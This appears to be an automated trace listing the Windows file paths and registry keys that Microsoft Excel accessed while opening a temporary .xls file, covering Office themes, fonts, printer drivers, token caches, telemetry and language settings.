C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\L2FWRID13NJ6JLFD35P5.temp
C:\Program Files (x86)\Microsoft Office\root\vfs\Fonts\calibril.ttf
C:\Windows\Fonts\calibril.ttf
C:\Program Files (x86)\Microsoft Office\root\vfs\Fonts\calibri.ttf
C:\Windows\Fonts\calibri.ttf
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\SystemResources\MSO99LRES.DLL.mun
C:\Program Files (x86)\Common Files\Microsoft Shared\SystemResources\MSO99LRES.DLL.mun
C:\Users\user\AppData\Roaming\Microsoft\Templates\
C:\Users\user\AppData\Roaming\Microsoft\Templates\Document Themes\Theme Colors\
C:\Users\user\AppData\Roaming
C:\Users\user\AppData\Roaming\Microsoft
C:\Users\user\AppData\Roaming\Microsoft\Templates
C:\Users\user\AppData\Roaming\Microsoft\Templates\Document Themes
C:\Users\user\AppData\Roaming\Microsoft\Templates\Document Themes\Theme Colors
C:\Users\user\AppData\Roaming\Microsoft\Templates\Document Themes\Theme Fonts\
C:\Users\user\AppData\Roaming\Microsoft\Templates\Document Themes\Theme Fonts
C:\Users\user\AppData\Roaming\Microsoft\Templates\Document Themes\Theme Effects\
C:\Users\user\AppData\Roaming\Microsoft\Templates\Document Themes\Theme Effects
C:\Users\user\AppData\Roaming\Microsoft\Templates\Document Themes\Theme Colors\*.xml
C:\Program Files (x86)\Microsoft Office\root\Office16\colorSchemes
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\colorSchemes
C:\Program Files (x86)\Common Files\Microsoft Shared\Office16\colorSchemes
C:\Program Files (x86)\Microsoft Office\root\Document Themes 16\Theme Colors\
C:\Program Files (x86)\Microsoft Office\root\Document Themes 16\Theme Colors\*.xml
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\Theme Colors\
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\Theme Colors
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\Theme Colors\*.xml
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Document Themes\1033\
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Document Themes\1033\Theme Colors\
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\User
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Document Themes
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Document Themes\1033
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Document Themes\1033\Theme Colors
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Document Themes\1033\Theme Colors\*.xml
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\SystemResources\MSO40UIRES.DLL.mun
C:\Program Files (x86)\Common Files\Microsoft Shared\SystemResources\MSO40UIRES.DLL.mun
C:\Program Files (x86)\Microsoft Office\root\Document Themes 16\Theme Colors\Blue Warm.xml
C:\Program Files (x86)\Microsoft Office\root\Document Themes 16\Theme Colors\Blue.xml
C:\Program Files (x86)\Microsoft Office\root\Document Themes 16\Theme Colors\Blue II.xml
C:\Program Files (x86)\Microsoft Office\root\Document Themes 16\Theme Colors\Blue Green.xml
C:\Program Files (x86)\Microsoft Office\root\Document Themes 16\Theme Colors\Green.xml
C:\Program Files (x86)\Microsoft Office\root\Document Themes 16\Theme Colors\Green Yellow.xml
C:\Program Files (x86)\Microsoft Office\root\Document Themes 16\Theme Colors\Yellow.xml
C:\Program Files (x86)\Microsoft Office\root\Document Themes 16\Theme Colors\Yellow Orange.xml
C:\Program Files (x86)\Microsoft Office\root\Document Themes 16\Theme Colors\Orange.xml
C:\Program Files (x86)\Microsoft Office\root\Document Themes 16\Theme Colors\Orange Red.xml
C:\Program Files (x86)\Microsoft Office\root\Document Themes 16\Theme Colors\Red Orange.xml
C:\Program Files (x86)\Microsoft Office\root\Document Themes 16\Theme Colors\Red.xml
C:\Program Files (x86)\Microsoft Office\root\Document Themes 16\Theme Colors\Red Violet.xml
C:\Program Files (x86)\Microsoft Office\root\Document Themes 16\Theme Colors\Violet.xml
C:\Program Files (x86)\Microsoft Office\root\Document Themes 16\Theme Colors\Violet II.xml
C:\Program Files (x86)\Microsoft Office\root\Document Themes 16\Theme Colors\Median.xml
C:\Program Files (x86)\Microsoft Office\root\Document Themes 16\Theme Colors\Paper.xml
C:\Program Files (x86)\Microsoft Office\root\Document Themes 16\Theme Colors\Marquee.xml
C:\Program Files (x86)\Microsoft Office\root\Document Themes 16\Theme Colors\Slipstream.xml
C:\Program Files (x86)\Microsoft Office\root\Document Themes 16\Theme Colors\Aspect.xml
C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\sxs.dll
C:\Windows\SysWOW64\sxs.dll
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\*.*
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\Theme Colors\*.*
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\*.*
C:\Windows\splwow64.exe
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\splwow64.exe
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\splwow64.exe 8192
C:\Windows\splwow64.exe 8192
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows
\Device\Bam
C:\Users\user\AppData\Local\Microsoft\PenWorkspace
C:\Users\user\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat
C:\Windows\bcastdvr\KnownGameList.bin
C:\Windows\bcastdvr
C:\Windows\System32\icu.dll
C:\Windows\globalization\ICU\zoneinfo64.res
C:\Windows\Globalization\Time Zone\timezones.xml
C:\Windows\globalization\ICU\windowsZones.res
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\b8ab77100df80ab2.automaticDestinations-ms
C:\Windows\System32\ApplicationFrameHost.exe
C:\Windows\System32
C:\Windows\System32\capauthz.dll
C:\Windows\ImmersiveControlPanel\resources.pri
C:\Windows\ImmersiveControlPanel\pris\resources*.pri
C:\Windows\rescache\_merged\987641329\29879607.pri
C:\Windows\ImmersiveControlPanel\pris\resources.en-US.pri
C:\Windows\System32\windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel
C:\Windows\ImmersiveControlPanel
C:\Windows\ImmersiveControlPanel\images
C:\Windows\ImmersiveControlPanel\images\desktop.ini
C:\Windows\ImmersiveControlPanel\images\logo.scale-100_altform-unplated.png
C:\Users\user\AppData\Local\Microsoft\Windows\Explorer
C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db
C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_16.db
C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete
C:\Windows\ImmersiveControlPanel\images\
C:\Windows\ImmersiveControlPanel\
C:\Windows\
C:\Windows\System32\kernel.appcore.dll
C:\Windows\System32\DriverStore\FileRepository\prnms009.inf_amd64_b1142994fb10cf54\MPDW-manifest.ini
C:\Windows\System32\spool\V4Dirs\FC63BAE9-521C-4DB0-9535-DF1D94494B7C\69b8a4a.BUD
C:\Windows\System32\spool\V4Dirs\FC63BAE9-521C-4DB0-9535-DF1D94494B7C\69b8a4a.gpd
C:\Windows\System32\urlmon.dll
C:\Windows\System32\iertutil.dll
C:\Windows\System32\srvcli.dll
C:\Windows\System32\netutils.dll
C:\Windows\System32\DriverStore\FileRepository\prnms009.inf_amd64_b1142994fb10cf54\MPDW_devmode_map.xml
C:\Windows\System32\en-US\combase.dll.mui
C:\Windows\System32\DriverStore\FileRepository\prnms009.inf_amd64_b1142994fb10cf54\MPDW-constraints.js
C:\Windows\System32\DriverStore\FileRepository\prnms003.inf_amd64_cce2ae2d764e8510\Amd64\PrintConfig.dll
C:\Windows\System32\sxs.dll
C:\Windows\System32\stdole2.tlb
C:\Windows\System32\msxml6.dll\1
C:\Windows\System32\msxml6.dll
C:\Windows\System32\spool\V4Dirs\FC63BAE9-521C-4DB0-9535-DF1D94494B7C\pdc.xml
C:\Windows\System32\en-US\localspl.dll.mui
C:\Windows\System32\en-US\prntvpt.dll.mui

C:\Users\user\AppData\Local\Temp\{D97DA1AE-2C1A-4825-BB08-AB4D047678BC} - OProcSessId.dat
C:\Users\user\AppData\Local\Temp\Diagnostics\EXCEL\App1765109128236847900_D97DA1AE-2C1A-4825-BB08-AB4D047678BC.log
\Device\RasAcd
C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\56a61aeb75d8f5be186c26607f4bb213abe7c5ec.tbres
C:\Users\user\AppData\Local\Temp\26bd031cb4a5333bbd77.xls
C:\Users\user\AppData\Local\Temp\~DFE07ADD6C110E689B.TMP
C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5475cb191e478c39370a215b2da98a37e9dc813d.tbres
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\F1C26189.emf
C:\Users\user\AppData\Local\Microsoft\Office\16.0\UsageMetricsStore\FileActivityStore\Excel\1380790193167760279.C4
C:\Users\user\AppData\Local\Microsoft\Office\16.0\UsageMetricsStore\FileActivityStore\Excel\ASkwMDAwMDAwMC0wMDAwLTAwMDAtMDAwMC0wMDAwMDAwMDAwMDBfTnVsbAA.S
C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db
C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db-wal
C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db-shm
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\L2FWRID13NJ6JLFD35P5.temp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
C:\Users\user\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat
C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db
C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_16.db

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5475cb191e478c39370a215b2da98a37e9dc813d.tbres
C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres
C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\e0495fde257df2ef62ee7e3fdb1ebb9d7ff72300.tbres
C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\e8ddd4cbd9c0504aace6ef7a13fa20d04fd52408.tbres
C:\Users\user\AppData\Local\Microsoft\Schemas\MS Excel_restart.xml
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\L2FWRID13NJ6JLFD35P5.temp

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Sorting\Versions\000603xx
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Sorting\Ids
HKEY_LOCAL_MACHINE\Software\Microsoft\ClickToRun\OverRide
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common\MID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\SusClientId
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\ClickToRun
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\ClickToRun\Configuration
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Configuration\PackageLockerPath
HKEY_LOCAL_MACHINE\Software\Microsoft\SoftGrid\4.5\Client\AppFS
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\AppVISV
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\AppVISV\c:\program files (x86)\microsoft office
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\AppV\Subsystem\Disabled
HKEY_LOCAL_MACHINE\
HKEY_LOCAL_MACHINE\Software
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SOFTWARE\Microsoft\AppV\Subsystem\VirtualRegistry
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\AppV\Subsystem\VirtualRegistry\PassThroughPaths
HKEY_LOCAL_MACHINE\SYSTEM\SELECT
HKEY_LOCAL_MACHINE\SYSTEM\Select\Current
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\AppV\Subsystem\ComExclusions
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-US
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-US
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\AppVISV\Virtualized
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\16.0\Excel\Options
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Excel\Options
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Excel\Options\DllPrevention
HKEY_CURRENT_USER\Software\Microsoft\Office\Excel
HKEY_CURRENT_USER\Software\Microsoft\Office\Excel\AvoidLargeAddresses
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\(Default)
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\CommonFilesDir
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\CommonFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\System\CurrentControlSet\Control\Lsa\FipsAlgorithmPolicy
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\FipsAlgorithmPolicy
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\FipsAlgorithmPolicy\STE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\FipsAlgorithmPolicy\Enabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\System\CurrentControlSet\Control\Lsa
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\FipsAlgorithmPolicy\MDMEnabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\SYSTEM\CurrentControlSet\Policies\Microsoft\Cryptography\Configuration
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Policies\Microsoft\Cryptography\Configuration
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office Test\Special\Perf
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\common\filespaths
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\common\filespaths\mso.dll
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\common\filespaths\mso.dll
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\AppRecoveryPingInterval
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\ShownFileFmtPrompt
HKEY_CURRENT_USER
HKEY_CURRENT_USER\Control Panel\International\Geo
HKEY_CURRENT_USER\Control Panel\International\Geo\Nation
HKEY_CURRENT_USER\Software\Policies
HKEY_CURRENT_USER\Software\Policies\Microsoft\Cloud
HKEY_CURRENT_USER\Software\Microsoft\Office
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office
HKEY_LOCAL_MACHINE\Software\Microsoft\Office
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Office
HKEY_CURRENT_USER\Software\Policies\Microsoft\Cloud\Office
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\cloud\Office
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\Sampling
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\Sampling\1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\Common\ClientTelemetry\Sampling
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\CountryCode
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\ExperimentConfigs\SDXInfo
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\SDXInfo
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\SDXInfo\SDXIdAndVersion
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Experiment\excel
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\excel
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\excel\Language
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\Common
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\Common\DevInstall
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\Common
HKEY_CURRENT_USER\Software\Microsoft\Office\Common
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\LabMachine
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\UpdateSupport\ExpiredBuild
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Configuration
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Configuration\AudienceId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\ProductReleaseIDs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\ProductReleaseIDs\ActiveConfiguration
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\ProductReleaseIDs\8D3810A9-D4E0-49C6-A71B-357728C38039\culture\x-none.16
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\ProductReleaseIDs\8D3810A9-D4E0-49C6-A71B-357728C38039\culture\x-none.16\StreamPackageUrl
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\AllowConsecutiveSlashesInUrlPathComponent
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\Common\ExperimentDogfood
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\Common\Experiment
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentEcs\Overrides
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentEcs\excel\Overrides
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentEcs\all\Overrides
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\ExternalFeatureOverrides\excel
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentEcs\excel
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\Expires
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\ApplicationUpgradeCandidate\excel
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\ExperimentConfigs\ApplicationUpgradeCandidate\excel
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\ApplicationUpgradeCandidate\excel\BuildVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSessionUpgradeCandidate\excel
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSessionUpgradeCandidate\excel
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSessionUpgradeCandidate\excel\BuildVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel\Expires
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData\VersionId
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData\ChunkCount
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData\0
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigIds
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ETag
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\common
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\MsoWerCrashDllPath
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\common\MsoWerCrashDllPath
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\CrashPersistence\EXCEL
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\Common\CrashPersistence\EXCEL\3476
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\CrashPersistence\EXCEL\3476
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\CrashPersistence\EXCEL\3476\0
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\Common\GOM
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\Common\GOM\ComplexRanges
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Debug
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Debug
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\CVH\VirtualProductInfo
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\CVH\VirtualProductInfo\PackageGUID
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-932793227-1321892499-785312009-1001\Components\0BC77486A266BF84FAE259379C82967F
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\0BC77486A266BF84FAE259379C82967F
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\ProductCodeListForC2RGimme
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\ProductCodeListForC2RGimme\{90160000-000F-0000-0000-0000000FF1CE}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Registration\{90160000-000F-0000-0000-0000000FF1CE}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Registration\{90160000-000F-0000-0000-0000000FF1CE}\ClickToRun
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\FeatureListForC2RGimme
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\FeatureListForC2RGimme\ProductFiles
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-932793227-1321892499-785312009-1001\Installer\Products\00006109F00000000000000000F01FEC
HKEY_USERS\S-1-5-21-932793227-1321892499-785312009-1001\Software\Microsoft\Installer\Products\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A725889A5DF965C4E84A0253A39A5952
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A725889A5DF965C4E84A0253A39A5952\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\LanguageResources
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\LanguageResources\SKULanguage
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages\en-US
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\LanguageResources
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\PreferredEditingLanguage
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\PreviousPreferredEditingLanguage
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\UIFallbackSource
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\LanguageResources\InstalledUICultures
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\LanguageResources\InstalledUICultures\en-us
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\UISnapshotLanguages
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\UIFallbackLanguages
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-932793227-1321892499-785312009-1001\Installer\Components\1A705E72D3831594090DD020E37EFC1A
HKEY_USERS\S-1-5-21-932793227-1321892499-785312009-1001\Software\Microsoft\Installer\Components\1A705E72D3831594090DD020E37EFC1A
HKEY_LOCAL_MACHINE\Software\Classes\Installer\Components\1A705E72D3831594090DD020E37EFC1A
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\PreferredUILanguageTagPendingInstall
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\FollowSystemUILanguage
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\LanguageResources\UILanguageInstallerFallbackOrder
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\HelpFallbackLanguages
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\HelpLanguageExplicit
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\LanguagePackTag
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\UILanguageTag
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\HelpLanguageTag
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\ExeMode
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\LanguageResources\EnabledLanguages
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\LangTuneUp
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\AuthoringLanguageCloud
